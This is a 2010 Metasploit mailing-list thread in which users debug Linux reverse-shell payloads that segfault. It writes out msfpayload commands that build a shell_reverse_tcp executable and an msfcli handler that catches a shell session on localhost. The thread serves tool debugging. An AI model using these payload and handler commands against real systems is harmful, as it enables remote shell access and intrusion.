Metasploit mailing list archives
Re: Linux payloads broken
From: Florian Roth <Neo.X () web de>
Date: Fri, 07 May 2010 18:05:18 +0200
It seems to me that Ramon is right. I get the same segmentation fault message and the kernel as the OS is similar to yours.

BUT - with a listening handler - everything works out fine.

--- Term 1
neo@ubuntu:/hack/framework3$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 X >out.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: LHOST=127.0.0.1,LPORT=80
neo@ubuntu:/hack/framework3$ ./out.elf
Segmentation fault
neo@ubuntu:/hack/framework3$ file out.elf
out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
neo@ubuntu:/hack/framework3$ uname -a
Linux ubuntu 2.6.32-22-generic #33-Ubuntu SMP Wed Apr 28 13:27:30 UTC 2010 i686 GNU/Linux

--- Term 2
neo@ubuntu:/hack/framework3$ sudo ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 E
[sudo] password for neo:
[*] Please wait while we load the module tree...

--- Term 1
neo@ubuntu:/hack/framework3$ ./out.elf

--- Term 2
[*] Started reverse handler on 127.0.0.1:80
[*] Starting the payload handler...
[*] Command shell session 1 opened (127.0.0.1:80 -> 127.0.0.1:49928)

----------------

I used svn r9101 updated 20 days ago (2010.04.17)

So please check again if the handler is set right and nothing interferes with the reverse connect.

Best,
Florian

On Fri, 2010-05-07 at 18:00 +0300, Konrads Smelkovs wrote:
Strace shows that it segfaults before any syscalls are placed. Furthermore, it appears that exec headers are corrupt. Whether I have listener or not on the other end doesn't matter.
--
Konrads Smelkovs
Applied IT sorcery.

On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle <ramon () metasploit com> wrote:

Did you set a listener on the selected port?

-Ramon

On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
> konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp
> LHOST=127.0.0.1 LPORT=80 X >out.elf
> Created by msfpayload (http://www.metasploit.com).
> Payload: linux/x86/shell_reverse_tcp
> Length: 71
> Options: LHOST=127.0.0.1,LPORT=80
> konrads@konrads-laptop:~/msf2$ file out.elf
> out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
> statically linked, *corrupted section header size*
> konrads@konrads-laptop:~/msf2$ chmod +x out.elf
> konrads@konrads-laptop:~/msf2$ ./out.elf
> *Segmentation fault*
> konrads@konrads-laptop:~/msf2$ uname -a
> Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09
> UTC 2010 i686 GNU/Linux
>
> Same for metsvc_reverse_tcp payload
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
--
Sincerely
Saludos cordiales
Mit freundlichen Grüßen

Florian Roth
Tel: +49 06251 - 827 9402
Mobil: +49 175 - 7240 363
Fax: +49 12125 - 11699510
eMail: Florian.Roth () email de